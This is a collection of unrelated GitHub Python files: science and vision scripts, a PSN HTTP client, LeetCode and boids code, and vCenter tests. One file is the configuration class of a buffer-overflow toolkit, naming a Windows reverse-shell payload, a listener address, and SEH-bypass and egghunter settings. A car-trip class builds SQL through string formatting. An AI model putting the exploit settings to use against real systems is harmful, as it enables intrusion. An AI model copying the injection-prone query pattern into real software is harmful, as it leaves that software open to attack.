compute_sparse_code(tail_angle=tail_angle,\n Dict=self.cfg_sparse_coding.Dict,\n Wg=[],\n lmbda=self.cfg_sparse_coding.lmbda,\n gamma=self.cfg_sparse_coding.gamma,\n 
mu=self.cfg_sparse_coding.mu,\n Whn=self.cfg_sparse_coding.window_inhib)\n \n def find_segment(self,z,tail_angle1d):\n return segment_from_code_w_fine_alignement(z=z,tail_angle1d=tail_angle1d,\n min_code_height=self.cfg_segment.min_code_height,\n min_spike_dist=self.cfg_segment.min_spike_dist,\n bout_duration=self.cfg_segment.bout_duration,\n margin_before_peak=self.cfg_segment.margin_before_peak,\n dict_peak=self.cfg_sparse_coding.dict_peak)\n \n def classify(self,X):\n return bouts_classifier(X,\n kNN_training_dataset=self.knn_training_dataset_augmented,\n weight=self.cfg_classify.feature_weight,\n n_neighbors=self.cfg_classify.N_kNN,\n tracking_method='tail')\n \n def run(self,tail_angle):\n \n tracking_data = Dataset_TailTracking(fps=self.cfg_tail_preprocess.fps,\n tail_angle=tail_angle)\n \n tail_angle_clean,baseline = self.preprocess_tail(tail_angle=tracking_data.tail_angle)\n N_c = self.cfg_tail_preprocess.tail_segment_cutoff\n tail_angle_detrend = tail_angle_clean[:,:N_c]-baseline[:,:N_c]\n \n tracking_data_clean = Dataset_TailTracking(fps=self.cfg_tail_preprocess.fps,\n tail_angle=tail_angle_clean-baseline)\n # Compute Sparse Code:\n sparse_code = self.compute_sparse_code(tail_angle_detrend)\n \n # Compute Segments:\n segments,segment_original,is_aligned = self.find_segment(z=sparse_code.z,tail_angle1d=tail_angle_detrend[:,N_c-1])\n \n tail_array = extract_bouts(tail_angle=tail_angle_detrend,\n segment = segments)\n \n # Classify:\n classification_res = self.classify(tail_array)\n \n # Refine segmentation:\n onset_shift = classification_res.onset_shift\n onset_refined = [on_ + int(onset_shift[i]) for i,on_ in enumerate(segments.onset)]\n offset_refined = [off_ + int(onset_shift[i]) for i,off_ in enumerate(segments.offset)]\n \n segments_refined = Segment(onset=onset_refined,offset=offset_refined,bout_duration=self.cfg_segment.bout_duration)\n\n tail_array_refined = extract_bouts(tail_angle=tail_angle_detrend,\n segment = segments_refined)\n \n # Compute Time series of categories:\n bout_category = classification_res.bout_category \n bout_category_ts,bout_category_ts_signed = compute_bout_cat_ts(segments_refined.onset,segments_refined.offset,bout_category,tracking_data.n_frames)\n \n # Compute result:\n res = PipelineFreeTailOnly_Result(tracking_data=tracking_data,\n tracking_data_clean = tracking_data_clean,\n baseline = baseline,\n sparse_code = sparse_code,\n segments = segments_refined,\n segments_original = segments,\n tail_array = tail_array_refined,\n classification = classification_res,\n bout_category_ts = bout_category_ts,\n bout_category_ts_signed = bout_category_ts_signed)\n\n self.res = res\n \n return self.res\n \n ","repo_name":"orger-lab/megabouts","sub_path":"megabouts/pipeline/full_tracking_tail_only.py","file_name":"full_tracking_tail_only.py","file_ext":"py","file_size_in_byte":7462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27873156519","text":"import getpass\nimport sys\nimport cv2\nimport matplotlib.pyplot as plt\n''' \n\n'b' 98 backward 1 frame\n'd' 100 backward 'frame_jump' frames\n'f' 102 forward 1 frame\n's' 115 save\n'u' 117 forward 'frame_jump' frames\n'''\nscaling_factor = 0.7\nvid_name = \"dog.mp4\" # l.mkv \"m.mp4\"\nframe_jump = 100\nframe_no = 65\nframe_name = 'frame_%d.jpg'\nBASE_FOLDER = 'C:/Users/' + getpass.getuser() +'/Videos/Captures/'\n\n\ndef readImagePath():\n input_file = BASE_FOLDER + vid_name\n return input_file\n\n\ninput_video_file = 
readImagePath()\n\nprint(input_video_file)\n\n\nvidcap = cv2.VideoCapture(input_video_file)\ntotalframecount = int(vidcap.get(cv2.CAP_PROP_FRAME_COUNT))\nif totalframecount == 0:\n    print(\"Error: Video file does not exist or is empty!\")\n    exit(-1)\nprint (f'Video [{input_video_file}] Frame count is {totalframecount}')\n\n#m.mp4 5 mkv 1\nwhile True:\n    vidcap.set(1, frame_no ); # Where frame_no is the frame you want\n    ret, frame = vidcap.read()\n    frame = cv2.resize(frame, None, fx=scaling_factor,\n                      fy=scaling_factor, interpolation=cv2.INTER_AREA)\n    cv2.imshow(vid_name, frame)\n\n\n    c = cv2.waitKey(1)\n    if c ==27: #esc\n        break\n    elif c == 115:# 's' save\n        print(\"Save image to \" + BASE_FOLDER+(frame_name) % frame_no)\n        #cv2.imwrite(os.path.join(pathOut, \"frame{:d}.jpg\".format(count)), frame)\n        # save frame as JPEG file\n        frame01 = cv2.resize(frame, None, fx=1,\n                      fy=1, interpolation=cv2.INTER_AREA)\n        cv2.imwrite(BASE_FOLDER+'/frame/'+(frame_name) % frame_no, frame01)\n\n    elif c==117: # ('u') move up\n        frame_no += frame_jump\n        if frame_no > totalframecount : frame_no =0\n        print(\"Move to frame number[{:d}]\".format(frame_no))\n    elif c==102:# 'f' forward 1 frame\n        frame_no += 1\n        if frame_no > totalframecount : frame_no =0\n        print(\"Move to frame number[{:d}]\".format(frame_no))\n    elif c==98:# 'b' backward 1 frame\n        frame_no -= 1\n        if frame_no < 0 : frame_no = totalframecount -1\n        print(\"Move to frame number[{:d}]\".format(frame_no))\n    elif c==100: # ('d') move down\n        frame_no -= frame_jump\n        if frame_no < 0 : frame_no = totalframecount -1\n        print(\"Move to frame number[{:d}]\".format(frame_no))\n","repo_name":"danizalm05/python01","sub_path":"opencv/ComputerVision/video/extract_frames.py","file_name":"extract_frames.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2915801885","text":"import database, datetime, trip\r\n\r\nclass car(object):\r\n    def __init__(self, vin=None, model=None):\r\n        self.vin = vin\r\n        self.model = model\r\n        self.trips = list()\r\n        self.trips = self._getTrips()\r\n\r\n    def _getTrips(self):\r\n        trips = list()\r\n        tripPoints = self._getTripPoints()\r\n        # There must be at least 2 trip points for one complete trip\r\n        if len(tripPoints) > 1:\r\n            start = {\"lat\": tripPoints[0][0], \"lon\": tripPoints[0][1]}\r\n            start['lat'] = float(start['lat'])\r\n            start['lon'] = float(start['lon'])\r\n            time_start = tripPoints[0][2]\r\n            i3 = 0\r\n            for point in tripPoints[1:]:\r\n                i3 += 1\r\n                end = {\"lat\": point[0], \"lon\": point[1]}\r\n                end['lat'] = float(end['lat'])\r\n                end['lon'] = float(end['lon'])\r\n                idle = datetime.datetime.strptime(point[3], \"%Y-%m-%d %H:%M:%S.%f\") - datetime.datetime.strptime(point[2], \"%Y-%m-%d %H:%M:%S.%f\")\r\n                # Only append trip if trip doesn't exist yet\r\n                if any(trip.time_start == time_start and trip.time_end == point[2] for trip in self.trips) == False:\r\n                    t = trip.trip(start, end, time_start, point[2], idle, self.model, self.vin)\r\n                    trips.append(t)\r\n                start = end\r\n                time_start = point[3]\r\n        return trips\r\n\r\n\r\n    def _getTripPoints(self):\r\n        query = \"SELECT lat, lon, timestamp as datetime, timestamp_end as datetime FROM %s WHERE vin = '%s' AND timestamp_end IS NOT '' ORDER BY timestamp\"% (self.model.location,self.vin[0])\r\n        trip_points = database.selectDataObjects(query, self.model.location)\r\n        return 
trip_points\r\n","repo_name":"oliverdlugosch/UserBasedRelocation","sub_path":"car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21349570358","text":"from tree import RGBXmasTree\nfrom colorzero import Color\nimport time\n# Write your program below\n\ntree = RGBXmasTree()\ninterval = 2\nstarLight = tree.star()\n\nwhile True:\n try:\n starLight.on()\n time.sleep(interval)\n starLight.off()\n time.sleep(interval)\n except KeyboardInterrupt:\n break\n\ntree.off()\n\n# Write your program above this line\ntree.close()","repo_name":"HSSBoston/raspi-python","sub_path":"projects/xmas-tree-3drgb/star-on-off.py","file_name":"star-on-off.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36290701918","text":"import logging\n\nimport aiohttp\nfrom galaxy.api.errors import UnknownBackendResponse\nfrom galaxy.http import handle_exception, create_client_session\n\nOAUTH_LOGIN_REDIRECT_URL = \"https://www.playstation.com/\"\n\nOAUTH_LOGIN_URL = \"https://web.np.playstation.com/api/session/v1/signin\" \\\n \"?redirect_uri=https://io.playstation.com/central/auth/login\" \\\n \"%3FpostSignInURL={redirect_url}\" \\\n \"%26cancelURL={redirect_url}\" \\\n \"&smcid=web:pdc\"\n\nOAUTH_LOGIN_URL = OAUTH_LOGIN_URL.format(redirect_url=OAUTH_LOGIN_REDIRECT_URL)\n\nREFRESH_COOKIES_URL = OAUTH_LOGIN_URL\n\nDEFAULT_TIMEOUT = 30\n\n\nclass CookieJar(aiohttp.CookieJar):\n def __init__(self):\n super().__init__()\n self._cookies_updated_callback = None\n\n def set_cookies_updated_callback(self, callback):\n self._cookies_updated_callback = callback\n\n def update_cookies(self, cookies, *args):\n super().update_cookies(cookies, *args)\n if cookies and self._cookies_updated_callback:\n self._cookies_updated_callback(list(self))\n\n\nclass HttpClient:\n\n def __init__(self):\n self._cookie_jar = CookieJar()\n self._session = create_client_session(cookie_jar=self._cookie_jar)\n\n async def close(self):\n await self._session.close()\n\n async def _request(self, method, url, *args, **kwargs):\n with handle_exception():\n return await self._session.request(method, url, *args, **kwargs)\n\n async def get(self, url, *args, **kwargs):\n silent = kwargs.pop('silent', False)\n get_json = kwargs.pop('get_json', True)\n response = await self._request(\"GET\", *args, url=url, **kwargs)\n try:\n raw_response = '***' if silent else await response.text()\n logging.debug(\"Response for:\\n{url}\\n{data}\".format(url=url, data=raw_response))\n return await response.json() if get_json else await response.text()\n except ValueError:\n logging.exception(\"Invalid response data for:\\n{url}\".format(url=url))\n raise UnknownBackendResponse()\n\n async def post(self, url, *args, **kwargs):\n logging.debug(\"Sending data:\\n{url}\".format(url=url))\n response = await self._request(\"POST\", *args, url=url, **kwargs)\n logging.debug(\"Response for post:\\n{url}\\n{data}\".format(url=url, data=await response.text()))\n return response\n\n def set_cookies_updated_callback(self, callback):\n self._cookie_jar.set_cookies_updated_callback(callback)\n\n def update_cookies(self, cookies):\n self._cookie_jar.update_cookies(cookies)\n\n async def refresh_cookies(self):\n await self.get(REFRESH_COOKIES_URL, silent=True, 
get_json=False)\n","repo_name":"Cloud-AC/galaxy-integration-psn","sub_path":"src/http_client.py","file_name":"http_client.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"23772520693","text":"#\n# @lc app=leetcode id=876 lang=python3\n#\n# [876] Middle of the Linked List\n#\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nfrom typing import Optional\n\n# @lc code=start\n# Definition for singly-linked list.\n\n\nclass Solution:\n def middleNode(self, head: Optional[ListNode]) -> Optional[ListNode]:\n # rabbit = head\n hare = head\n\n while hare and hare.next:\n head = head.next\n hare = hare.next.next\n \n return head\n\n \n# @lc code=end\n\n","repo_name":"SilasStokes/leetcode","sub_path":"python/876.middle-of-the-linked-list.py","file_name":"876.middle-of-the-linked-list.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20721987891","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport pdb\nfrom pandas import *\nfrom scipy import stats # for linear regression \nfrom sklearn import datasets\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn import linear_model\n#********************************\ndata = read_csv('rpifinaldata.csv')\nt = data['Date/Time']\nx = data['CPU usage %']\ny = data['Temperature C'] \n#********************************\nf1 = plt.figure(1)\n\nX = data.loc[:, 'CPU usage %':'Temperature C']\nlr = linear_model.LinearRegression()\npredicted = cross_val_predict(lr,X,y,cv=10) \n\nplt.scatter(y,predicted,c='y',marker='o',edgecolors=(0,0,0))\nplt.plot([y.min(),y.max()], [y.min(),y.max()], lw=3)\n\nplt.xlabel('Temperature C')\nplt.ylabel('predicted')\nplt.title('Cross-Validation Prediction')\n#***************Method two*********************\nf2 = plt.figure(2)\n# subtitute X with x.reshape(-1,1) CPU data only\nlr = linear_model.LinearRegression()\npredicted = cross_val_predict(lr,x.reshape(-1,1),y,cv=10) \n\nplt.scatter(y,predicted,c='y',marker='o',edgecolors=(0,0,0))\nplt.plot([y.min(),y.max()], [y.min(),y.max()], lw=3)\n\nplt.xlabel('Temperature C')\nplt.ylabel('predicted')\nplt.title('Cross-Validation Prediction')\nplt.show()\n","repo_name":"AbdullahAlnutayfat/EE-629-A","sub_path":"finalproject/cross_validation.py","file_name":"cross_validation.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30995649341","text":"import operator\n\nfrom collections import Counter, defaultdict, deque, OrderedDict\nfrom contextlib import suppress\nfrom functools import reduce\nfrom itertools import accumulate, combinations_with_replacement, count, islice\nfrom math import sqrt\n\nfrom .primes import factors, is_factor, is_prime, prime_factors, primes\n\n\nCOLLATZ_CACHE = {\n 1: (1, 1),\n}\n\n\ndef _populate_collatz_cache(n):\n subchain = OrderedDict()\n while n not in COLLATZ_CACHE.keys():\n nxt = (3*n + 1) if (n&1) else (n//2)\n subchain[n] = n = nxt\n\n base_ln = COLLATZ_CACHE[n][1]\n subchain = {\n n: (nxt, i+base_ln)\n for i, (n, nxt) in enumerate(reversed(subchain.items()), start=1)\n }\n COLLATZ_CACHE.update(subchain)\n\n\ndef collatz(n):\n \"\"\"\n Generate the Collatz sequence for a given starting integer n\n \"\"\"\n if n not in COLLATZ_CACHE:\n 
_populate_collatz_cache(n)\n\n while True:\n yield n\n if n == 1:\n break\n n, _ = COLLATZ_CACHE[n]\n\n\ndef collatz_length(n):\n \"\"\"\n Return the length of the Collatz chain for a given starting integer n\n \"\"\"\n if n not in COLLATZ_CACHE:\n _populate_collatz_cache(n)\n\n _, ln = COLLATZ_CACHE[n]\n return ln\n\n\ndef columns(matrix):\n \"\"\"\n Shorcut for forming a generator over the columns of a matrix\n \"\"\"\n return (c for c in transpose(matrix))\n\n\ndef diagonals(matrix, forward=True):\n \"\"\"\n Iterate over the diagonals of a 2-D matrix\n \"\"\"\n diags = defaultdict(deque)\n for i, row in enumerate(reversed(matrix)):\n if not forward:\n row = reversed(row)\n for j, n in enumerate(row):\n diags[i+j].appendleft(n)\n return (diag for _, diag in sorted(diags.items()))\n\n\ndef digits(count):\n \"\"\"\n Generate all of the numbers with the specified digit count\n \"\"\"\n return range(10**(count - 1), 10**count)\n\n\ndef even(seq):\n \"\"\"\n Pull out the even terms of a sequence\n \"\"\"\n return (n for n in seq if n % 2 == 0)\n\n\ndef fibonacci(a=1, b=1, terms=None, limit=None, inclusive=False):\n \"\"\"\n Generate the fibonacci sequence\n\n The starting terms can be specified and the sequence will continue up to\n the specified term, or stop below the limit, whichever comes first. The\n limit can be made inclusive.\n If term and limit are not specified it will continue indefinitely.\n \"\"\"\n i = 0\n if inclusive and limit is not None:\n limit += 1\n while True:\n if limit is not None and a >= limit:\n break\n elif terms is not None:\n if i >= terms:\n break\n yield a\n a, b = b, a+b\n i += 1\n\n\ndef is_palindrome(i):\n \"\"\"\n Determine whether the argument is a palindrome\n \"\"\"\n i_string = str(i)\n if i_string == i_string[::-1]:\n return True\n return False\n\n\ndef lcm(limit, inclusive=False):\n \"\"\"\n Find the lowest common multiple of all numbers below the limit\n\n Can be made inclusive of the limit.\n \"\"\"\n if inclusive:\n limit += 1\n signature = {}\n for i in range(limit):\n if is_prime(i):\n factors = Counter([i])\n else:\n factors = Counter(prime_factors(i))\n signature.update(\n {\n p: c\n for p, c in factors.items()\n if c > signature.get(p, 0)\n }\n )\n return product(p ** c for p, c in signature.items())\n\n\ndef multiples(factors, limit, inclusive=False):\n \"\"\"\n Find the multiples of factors below a certain limit\n\n Can be made inclusive so that it finds the multiples up to and\n including the limit. 
Implemented by checking if any of the factors\n are a factor of every number up to the limit.\n \"\"\"\n if inclusive:\n limit += 1\n for i in range(1, limit):\n if any(is_factor(f, i) for f in factors):\n yield i\n\n\ndef odd(seq):\n \"\"\"\n Pull out the odd terms of a sequence\n \"\"\"\n return (n for n in seq if n % 2 != 0)\n\n\ndef paths(n):\n \"\"\"\n Calculate the paths through a lattice of size n*n\n \"\"\"\n def get_moves(x, y):\n if x < n:\n yield (x+1, y)\n if y < n:\n yield (x, y+1)\n\n def count_paths(x, y):\n moves = get_moves(x, y)\n with suppress(StopIteration):\n move = next(moves)\n yield from count_paths(*move)\n move = next(moves)\n yield from count_paths(*move)\n yield 1\n\n start = (0, 0)\n path_count = 1 + sum(count_paths(*start))\n return path_count\n\n\ndef power_digit_sum(power, base=2):\n \"\"\"\n Calculate the sum of the digits given by raising base to a certain power\n \"\"\"\n return sum(int(d) for d in str(base**power))\n\n\ndef product(seq):\n \"\"\"\n Calculate the product of a sequence\n\n The multiplicative equivalent of the builtin sum function.\n \"\"\"\n return reduce(operator.mul, seq, 1)\n\n\ndef products(seq):\n \"\"\"\n Generate the products of every pairwise combination of terms of a sequence\n \"\"\"\n return (a*b for a, b in combinations_with_replacement(seq, 2))\n\n\ndef pythagorean_triplet(c):\n \"\"\"\n Derive the pythagorean triplet belonging to a given hypotenuse\n\n Returns an empty tuple if the hypotenuse does not belong to a pythagorean\n triplet.\n \"\"\"\n c_squared = c**2\n for a in range(1, c):\n b = sqrt(c_squared - (a**2))\n if b.is_integer():\n return (a, int(b), c)\n return tuple()\n\n\ndef rows(matrix):\n \"\"\"\n Shortcut for forming a generator over the rows of a matrix\n \"\"\"\n return (r for r in matrix)\n\n\ndef sliding_window(seq, size=1, bounded=False):\n \"\"\"\n Generate succesive windows of a given size across a sequence\n\n The window will slide to the end of the sequence at which point it will\n reduce in size to zero as it runs out of terms. If the window is bigger\n than the sequence it will behave as if it is already at the end, i.e. 
it\n will start to tail off straight away.\n\n If stricter behaviour is required the bounded keyword can be set to True,\n in which case each window will contain exactly size number of terms; it\n will not tail off and must be smaller than or equal to the size of the\n sequence itself.\n \"\"\"\n if bounded:\n seq = list(seq)\n seq_len = len(seq)\n for i, _ in enumerate(seq):\n window_limit = i + size\n if bounded and window_limit > seq_len:\n break\n yield islice(seq, i, i+size)\n\n\ndef squares(seq):\n \"\"\"\n Generate squares for each term in a sequence\n \"\"\"\n return (n**2 for n in seq)\n\n\ndef square_sum(seq):\n \"\"\"\n Find the square of the sum of the terms of a sequence\n \"\"\"\n return sum(seq)**2\n\n\ndef sum_squares(seq):\n \"\"\"\n Find the sum of the squares of the terms of a sequence\n \"\"\"\n return sum(squares(seq))\n\n\ndef transpose(matrix):\n \"\"\"\n Transpose a 2-D matrix\n \"\"\"\n return zip(*matrix)\n\n\ndef triangular_numbers(terms=None, limit=None, inclusive=False):\n \"\"\"\n Generate the triangular numbers up to a given limit or term\n\n Can be made inclusive of the limit.\n \"\"\"\n if limit and inclusive:\n limit += 1\n for i, n in enumerate(accumulate(count(1)), 1):\n limit_reached = limit is not None and n >= limit\n terms_reached = terms is not None and i > terms\n if limit_reached or terms_reached:\n break\n yield n\n","repo_name":"mchlrhw/project-euler-python","sub_path":"euler/lib/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21003561124","text":"import random\nimport pygame as pg\nclass Boid:\n def __init__(self, velX, velY, screenwidth, screenheight):\n self.radius = random.randint(5, 15)\n self.position = pg.math.Vector2(random.randrange(screenwidth), random.randrange(screenheight))\n self.velocity = pg.math.Vector2(0, 0)\n self.acceleration = pg.math.Vector2(0, 0)\n self.velocity.x, self.velocity.y = velX, velY\n self.maxForce = 0.010\n\n def wrap(self, x, y):\n if self.position.x > x:\n self.position.x = 0\n\n if self.position.x < 0:\n self.position.x = x\n\n if self.position.y > y:\n self.position.y = 0\n\n if self.position.y < 0:\n self.position.y = y\n\n def alignment(self, boids, radius):\n pos = []\n total = 0\n for boid in boids:\n if boid != self and self.position.distance_to(boid.position) < radius:\n pos.append(boid.velocity)\n total += 1\n\n sum = pg.math.Vector2(0, 0)\n for p in pos:\n sum += p\n\n if total != 0:\n sum = sum / total\n steerin = sum - self.velocity\n if(steerin.magnitude()!=0):\n steerin = steerin.normalize()*self.maxForce*1.6\n self.acceleration += steerin\n\n def cohesion(self, boids, radius):\n pos = pg.math.Vector2(0, 0)\n total = 0\n for boid in boids:\n if boid != self and self.position.distance_to(boid.position) < radius:\n pos += boid.position\n total += 1\n\n if total != 0:\n sum = pos / total\n steerin = sum - self.position\n if(steerin.magnitude()!=0):\n steerin = steerin.normalize()*self.maxForce*2\n self.acceleration += steerin\n\n def separation(self, boids, radius):\n pos = pg.math.Vector2(0, 0)\n total = 0\n for boid in boids:\n if boid != self and self.position.distance_to(boid.position) < radius and self.position.distance_to(boid.position)>0:\n diff = self.position - boid.position\n diff /= self.position.distance_to(boid.position)\n pos += diff\n total += 1\n\n if total != 0:\n sum = pos / total\n steerin = sum\n if(steerin.magnitude()!=0):\n steerin -= 
self.velocity\n                steerin = steerin.normalize()*self.maxForce*2.5\n            self.acceleration += steerin","repo_name":"KillyTheCat/pyBoids","sub_path":"boid.py","file_name":"boid.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18361459179","text":"import os\nimport sys\n\nclass Config:\n\n    localip = \"192.168.105.1\"\n    localport = 7777\n    verbose_lv = 2\n\n    remoteip = \"\"\n    remoteport = 0\n    mode = \"\"\n    field = \"\"\n    platform = \"windows\"\n    reverse = \"windows/shell_reverse_tcp\"\n\n    http_method = \"HEAD\"\n    http_uri = \"\"\n\n    user = \"anonymous\"\n    passwd = \"123@test.com\"\n\n    fuzzer_type = \"\"\n    fuzzer_buffer = \"A\"\n    offset = 1\n    overflow = 0\n\n    session_ignore = False\n\n    badchars = \"\"\n    shellcode = \"\"\n\n    # jmpesp_add = \"\"\n    # eip = \"\"\n    # esp = \"\"\n    # buffer = \"\"\n\n    #################################\n    # SEHByPass Attributes\n\n    # offset = 1\n    nextseh = \"\"\n    seh = \"\"\n    ppr_address = \"\"\n    # payload = \"D\" * 400\n    # nops = 0\n    skip_seh = \"\" # \"\\x90\\x90\\xeb\\x06\"\n\n    #################################\n    # EggHunter Attributes\n\n    #offset = 1\n    # eip = \"B\" * 4\n    # esp = \"C\" * 4\n    payload = \"\"\n    nops = 0\n    jmpesp_add = \"\"\n    instruction = \"\" # \"\\xeb\\xca\" #jmp short\n    # hunter = \"\"\n    egg = \"T00WT00W\"\n    src_address = \"\"\n    dest_address = \"\"\n\n\n","repo_name":"danieljs777/fastoverflowtk","sub_path":"utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"32"} +{"seq_id":"1117612385","text":"from modules.Connection import Connection\nimport requests\n\n\nclass TestConnection:\n    def test_vcsa_connect(self, setup_vcsa_url):\n        response = requests.get(setup_vcsa_url)\n        assert response.status_code == 200, 'Response code 200 from the vcsa-exporter expected!'\n\n    def test_login_success(self, setup_vcenter, session_id):\n        setup_vcenter.login()\n        assert setup_vcenter.con.session_id == session_id,\\\n            'After a login the presence of the correct session ID is expected.'\n\n    def test_logout_success(self, setup_vcenter):\n        connection = Connection(setup_vcenter)\n        connection.login()\n        response = connection.logout()\n        assert response is True, 'Expected the response \"True\" for a successful logout.'\n\n    def test_login_failure(self, setup_vcenter):\n        connection = Connection(setup_vcenter)\n        connection.pw = 'False'\n        response = connection.login()\n        assert response is False, 'Expected the response \"False\" for a failed login.'\n\n    def test_logout_failure(self, setup_vcenter):\n        connection = Connection(setup_vcenter)\n        connection.session_id = 'False'\n        response = connection.logout()\n        assert response is False, 'Expected the response \"False\" for a failed logout.'\n","repo_name":"sapcc/vcsa-exporter","sub_path":"tests/test_connection.py","file_name":"test_connection.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"1739647804","text":"import json\nimport paho.mqtt.client as mqtt\n\n# Connect to the MQTT broker\nclient = mqtt.Client()\n\nif client.connect(\"0.0.0.0\", 1883, 60)!=0:\n    print(\"could not connect to MQTT broker!\")\n    import sys\n    sys.exit(-1)\n\n# Create the message\nmessage = {\n    \"dateHour\": \"2023-05-08T14:40:00\",\n    \"gpsSpeed\": 60,\n    \"gpsSatCount\": 8,\n    \"Gear\": \"3\",\n    \"Brake_pedal\": 0.5,\n    \"Accel_pedal\": 
0.8\n}\njson_message = json.dumps(message)\n\n# Publish the message to the \"vehicle/sensor_data\" topic\nclient.publish(\"vehicle/sensor_data\", json_message)\n\n# Disconnect from the broker\nclient.disconnect()\n","repo_name":"batuan/jems9_gcp_iot_project","sub_path":"script/pusht_to_hivemq.py","file_name":"pusht_to_hivemq.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12201455927","text":"# coding: utf-8\nimport pprint\nimport six\nfrom enum import Enum\nfrom . import AbstractHumanUserUpdate\n\n\nclass HumanUserCreate(AbstractHumanUserUpdate):\n\n swagger_types = {\n \n 'primary_account': 'int',\n }\n\n attribute_map = {\n 'primary_account': 'primaryAccount',\n }\n\n \n _primary_account = None\n\n def __init__(self, **kwargs):\n self.discriminator = None\n \n self.primary_account = kwargs.get('primary_account', None)\n super().__init__(**kwargs)\n self.swagger_types.update(super().swagger_types)\n self.attribute_map.update(super().attribute_map)\n\n \n @property\n def primary_account(self):\n \"\"\"Gets the primary_account of this HumanUserCreate.\n\n The primary account that the user belongs to.\n\n :return: The primary_account of this HumanUserCreate.\n :rtype: int\n \"\"\"\n return self._primary_account\n\n @primary_account.setter\n def primary_account(self, primary_account):\n \"\"\"Sets the primary_account of this HumanUserCreate.\n\n The primary account that the user belongs to.\n\n :param primary_account: The primary_account of this HumanUserCreate.\n :type: int\n \"\"\"\n\n self._primary_account = primary_account\n \n\n def to_dict(self):\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n elif isinstance(value, Enum):\n result[attr] = value.value\n else:\n result[attr] = value\n if issubclass(HumanUserCreate, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n return self.to_str()\n\n def __eq__(self, other):\n if not isinstance(other, HumanUserCreate):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"wallee-payment/python-sdk","sub_path":"wallee/models/human_user_create.py","file_name":"human_user_create.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"40701761235","text":"import math\nimport time\n\n\nclass Solution(object):\n def romanToInt(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if (0 == len(s)):\n return 0\n iResult = 0\n dcRoman = {\"I\": 1, \"V\": 5, \"X\": 10, \"L\": 50, \"C\": 100, \"D\": 500,\n \"M\": 1000}\n sRoman = s\n\n for iIndex in range(len(sRoman) - 1):\n iCur = dcRoman[sRoman[iIndex]]\n iNext = dcRoman[sRoman[iIndex + 1]]\n if (iCur < iNext):\n iResult -= iCur\n else:\n iResult += iCur\n print(iCur, iNext, iResult)\n\n iResult += dcRoman[sRoman[-1]]\n return iResult\n\n\ndef main():\n sRoman = \"III\"\n # sRoman = \"MCMXCIV\"\n 
solution = Solution()\n\n    fStart = time.time()\n    print(solution.romanToInt(sRoman))\n    fStop = time.time()\n    print(\"time: \", (fStop - fStart) * 1000, \"ms\")\n    # print(solution.judgePrime(4))\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"jaysimon/leetcode","sub_path":"junior/07-math/03-romanToInt.py","file_name":"03-romanToInt.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18870762168","text":"import json\nimport boto3\n\n\ndef handler(event, context):\n    movie = json.loads(event['body'])\n    item = {\n        'code': movie['code'], # Movie identifier code\n        'title': movie['title'], # Movie title\n        'genre': movie['genre'] # Movie genre\n    }\n\n    dynamodb = boto3.resource('dynamodb')\n    table = dynamodb.Table('MoviesTable')\n    result = table.put_item(Item=item)\n\n    body = {\n        \"message\": \"create\",\n        \"input\": movie\n    }\n\n    response = {\n        \"statusCode\": result['ResponseMetadata']['HTTPStatusCode'], #200\n        \"headers\": {\n            'Access-Control-Allow-Origin': '*',\n            'Access-Control-Allow-Methods': 'OPTIONS, PUT'\n        },\n        \"body\": json.dumps(body)\n    }\n\n    return response","repo_name":"ServerlessTrIT/practica-final-aws-oscar-gz","sub_path":"backend/movies/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39324303777","text":"from . import dispatcher\nfrom . import utils\nfrom . import matrices\nimport joblib\nimport 